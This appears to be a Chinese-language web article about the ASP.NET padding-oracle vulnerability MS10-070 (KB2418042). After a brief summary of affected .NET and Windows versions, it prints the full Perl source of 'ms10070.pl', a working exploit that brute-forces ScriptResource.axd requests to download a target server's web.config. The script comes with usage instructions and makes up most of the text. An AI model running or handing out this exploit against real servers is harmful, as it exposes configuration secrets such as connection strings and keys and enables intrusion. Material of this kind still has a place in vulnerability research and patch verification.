其他参考文章:动软ASP.NET数据库组件连接字符串加密算法安全缺陷
MS10-070补丁代码为KB2418042,报道称,这个漏洞将使得攻击这能够查看目标服务器的加密数据,比如View State,甚至还可以读取目标服务器上的文件数据,比如web.config,更有甚者称能够利用这个漏洞篡改服务器上的文件数据。
我们来详细看一下这个漏洞的相关信息:
微软指出,.NET Framework 3.5 SP1之前的版本并不受此漏洞影响。微软将此次发布的补丁定级为重要,适用于除了.NET Framework 1.0 SP3之外的当前所有ASP.NET版本。存在的这个漏洞影响的操作系统包括:Windows XP SP3、Windows Server 2003、Windows Vista、Windows Server 2008、Windows 7、Windows Server 2008 R2。
这个补丁的公共编号为MS10-070,知识库编号为KB2418042,是微软继月初发布9个例行补丁之后的第十个补丁,也是为数不多的几个紧急补丁。
程序代码的名称是:exploit tool for downloading Web.config
也就是web.config下载利用程序
- ms10070.pl
#!/usr/bin/perl use LWP::UserAgent; use strict; use Getopt::Std; use MIME::Base64; use URI::Escape; use Getopt::Long; #Definition of vars for .NET my $toEncodeDecode; my $b64Encoded; my $string; my $returnVal; my $testUrl; my $testBytes; my $sampleBytes; my $testUrl = @ARGV[0]."\?d\="; my $sampleBytes = @ARGV[1]; my $blockSize = @ARGV[2]; if ($#ARGV < 2) { die " Use: Web.config_bruter.pl ScriptResourceUrl Encrypted_Sample BlockSize Where: URL = The target URL (and query string if applicable) EncryptedSample = The encrypted value you want to use. This need to come from Padbuster. BlockSize = The block size being used by the algorithm (8 or 16) Poc code by giorgio.fedon\@mindedsecurity.com Original Padbuster code from Brian Holyfield - Gotham Digital Science Command Example: ./Web.config_bruter.pl https://127.0.0.1:8083/ScriptResource.axd d1ARvno0iSA6Ez7Z0GEAmAy3BpX8a2 16 ";} my $method = "GET"; $sampleBytes = encoder($sampleBytes, 1); my $testBytes = "\x00" x $blockSize; my $counter = 0; # Use random bytes my @nums = (0..255); my $status = 1; while ($status) { # Fuzz the test bytes for (my $byteNum = $blockSize - 1; $byteNum >= 0; $byteNum--) { substr($testBytes, $byteNum, 1, chr($nums[rand(@nums)])); } # Combine the test bytes and the sample my $combinedTestBytes = encoder($testBytes.$sampleBytes, 0); chomp($combinedTestBytes); $combinedTestBytes =~ s/\%0A//g; # Ok, now make the request my ($status, $content, $location, $contentLength) = makeRequest($method, $testUrl.$combinedTestBytes); if ($status == "200") { # Remove this for "T" exploit if (index($content,"parent\.Sys\.Application") == -1) { print $content."\n\n"; print "Total Requests:".$counter."\n\n"; print "Resulting Exploit Block:".$combinedTestBytes."\n\n"; last; } } $counter++; } # The following code is taken from PadBuster. Credit: Brian Holyfield - Gotham Digital Science # I also did the encoder / decoder, but your logic is definitely better sub encoder { my ($toEncodeDecode, $oper) = @_; # UrlDecoder Encoder if ($oper == 1) { $toEncodeDecode =~ s/\-/\+/g; $toEncodeDecode =~ s/\_/\//g; my $count = chop($toEncodeDecode); $toEncodeDecode = $toEncodeDecode.("=" x int($count)); $returnVal = decode_base64($toEncodeDecode); } else { $b64Encoded = encode_base64($toEncodeDecode); $b64Encoded =~ s/(\r|\n)//g; $b64Encoded =~ s/\+/\-/g; $b64Encoded =~ s/\//\_/g; my $count = $b64Encoded =~ s/\=//g; ($count eq "") ? ($count = 0) : ""; $returnVal = $b64Encoded.$count; } return $returnVal; } sub makeRequest { my ($method, $url) = @_; my ($lwp, $status, $content, $req, $location, $contentLength); # Setup LWP UserAgent $lwp = LWP::UserAgent->new(env_proxy => 1, keep_alive => 1, timeout => 30, requests_redirectable => [], ); $req = new HTTP::Request $method => $url; my $response = $lwp->request($req); # Extract the required attributes from the response $status = substr($response->status_line, 0, 3); $content = $response->content; #print $content; $location = $response->header("Location"); if ($location eq "") { $location = "N/A"; } $contentLength = $response->header("Content-Length"); return ($status, $content, $location, $contentLength); }